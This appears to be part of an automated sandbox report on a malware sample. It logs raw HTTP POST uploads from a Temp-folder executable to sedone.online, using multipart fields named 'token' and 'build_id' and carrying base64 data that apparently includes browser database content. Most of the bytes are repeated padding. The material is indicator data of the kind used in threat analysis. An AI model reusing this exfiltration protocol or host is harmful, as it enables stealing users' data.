AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-16 10:05:01 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-16 10:05:01 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-16 10:05:01 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-16 10:05:01 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-16 10:05:01 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-16 10:05:01 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-16 10:05:01 UTC	16355	OUT	Data Raw: 30 63 32 4e 79 5a 57 56 75 58 33 56 79 62 46 39 69 62 47 39 6a 61 33 4e 66 59 6e 6c 77 59 58 4e 7a 5a 57 52 66 59 32 39 31 62 6e 52 6c 63 69 42 4a 54 6c 52 46 52 30 56 53 4c 48 4e 74 59 58 4a 30 63 32 4e 79 5a 57 56 75 58 32 52 76 64 32 35 73 62 32 46 6b 58 32 4a 73 62 32 4e 72 63 31 39 6a 62 33 56 75 64 47 56 79 49 45 6c 4f 56 45 56 48 52 56 49 73 63 32 31 68 63 6e 52 7a 59 33 4a 6c 5a 57 35 66 5a 47 39 33 62 6d 78 76 59 57 52 66 59 6d 78 76 59 32 74 7a 58 32 4a 35 63 47 46 7a 63 32 56 6b 58 32 4e 76 64 57 35 30 5a 58 49 67 53 55 35 55 52 55 64 46 55 69 78 7a 62 57 46 79 64 48 4e 6a 63 6d 56 6c 62 6c 39 74 59 57 78 32 5a 58 4a 30 61 58 4e 70 62 6d 64 66 59 6d 78 76 59 32 74 7a 58 32 4e 76 64 57 35 30 5a 58 49 67 53 55 35 55 52 55 64 46 55 69 78 68 59 6e Data Ascii: 0c2NyZWVuX3VybF9ibG9ja3NfYnlwYXNzZWRfY291bnRlciBJTlRFR0VSLHNtYXJ0c2NyZWVuX2Rvd25sb2FkX2Jsb2Nrc19jb3VudGVyIElOVEVHRVIsc21hcnRzY3JlZW5fZG93bmxvYWRfYmxvY2tzX2J5cGFzc2VkX2NvdW50ZXIgSU5URUdFUixzbWFydHNjcmVlbl9tYWx2ZXJ0aXNpbmdfYmxvY2tzX2NvdW50ZXIgSU5URUdFUixhYn
2024-12-16 10:05:01 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-16 10:05:03 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 16 Dec 2024 10:05:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.5	50150	116.203.12.114	443	1084	C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 10:05:02 UTC	328	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----EKNYUKXBA1NYU3OPHVSJ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Content-Length: 393697 Connection: Keep-Alive Cache-Control: no-cache
2024-12-16 10:05:02 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 4b 4e 59 55 4b 58 42 41 31 4e 59 55 33 4f 50 48 56 53 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 36 32 63 30 31 38 38 32 63 38 32 36 33 39 39 37 35 31 36 66 64 34 62 36 33 36 33 62 38 38 61 0d 0a 2d 2d 2d 2d 2d 2d 45 4b 4e 59 55 4b 58 42 41 31 4e 59 55 33 4f 50 48 56 53 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 45 4b 4e 59 55 4b 58 42 41 31 4e 59 55 33 4f 50 48 56 53 4a 0d 0a 43 6f 6e 74 Data Ascii: ------EKNYUKXBA1NYU3OPHVSJContent-Disposition: form-data; name="token"e62c01882c8263997516fd4b6363b88a------EKNYUKXBA1NYU3OPHVSJContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------EKNYUKXBA1NYU3OPHVSJCont
2024-12-16 10:05:02 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-16 10:05:02 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-16 10:05:02 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-16 10:05:02 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-16 10:05:02 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-16 10:05:02 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-16 10:05:02 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-16 10:05:02 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-16 10:05:02 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: 